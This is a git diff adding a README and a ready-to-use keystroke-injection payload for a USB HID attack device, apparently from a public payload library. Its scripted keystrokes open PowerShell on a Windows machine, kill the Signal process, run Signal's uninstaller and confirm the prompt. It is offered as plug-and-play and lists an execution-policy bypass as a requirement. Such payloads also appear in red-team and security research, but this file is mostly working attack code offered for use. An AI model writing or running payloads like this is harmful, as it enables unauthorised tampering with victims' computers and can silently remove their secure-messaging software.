diff --git a/payloads/library/execution/UninstallSignal/README.md b/payloads/library/execution/UninstallSignal/README.md new file mode 100644 index 000000000..d079d9dab --- /dev/null +++ b/payloads/library/execution/UninstallSignal/README.md @@ -0,0 +1,42 @@ +# Uninstall Signal + +A script used to uninstall signal-desktop app on Windows users. + +**Category**: Execution + +## Description + +A script used to uninstall signal-desktop app on Windows users. + +Open a PowerShell, stop the Signal proccess if it runs and then execute the uninstall file trhough general path. + +## Dependencies + +* Signal App installed (obviously LOL) +* ExecutionPolicy Bypass + +## Settings + +- Nothing to set, this payload is Plug-And-Play <3 + +## Credits + +

Aleff :octocat:

+
+ + + + + +
+ + + +
Github +
+ + + +
LinkedIn +
+
diff --git a/payloads/library/execution/UninstallSignal/payload.txt b/payloads/library/execution/UninstallSignal/payload.txt new file mode 100644 index 000000000..ec101489b --- /dev/null +++ b/payloads/library/execution/UninstallSignal/payload.txt @@ -0,0 +1,34 @@ +##################################### +# # +# Title : Uninstall Signal # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10-11 # +# # +##################################### + +ATTACKMODE HID + +# Plug-And-Play <3 + +# Requirements: +# - Signal App installed +# - ExecutionPolicy Bypass + +QUACK DELAY 2000 +QUACK GUI r +QUACK DELAY 1000 +QUACK STRING powershell +QUACK ENTER +QUACK DELAY 2000 + +QUACK STRING Stop-Process -Name \"Signal\" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING Start-Process \"\$env:LocalAppData\Programs\signal-desktop\Uninstall Signal.exe\" +QUACK ENTER +QUACK DELAY 1000 +# Popup 'Are you sure?' +QUACK ENTER +QUACK ALT F4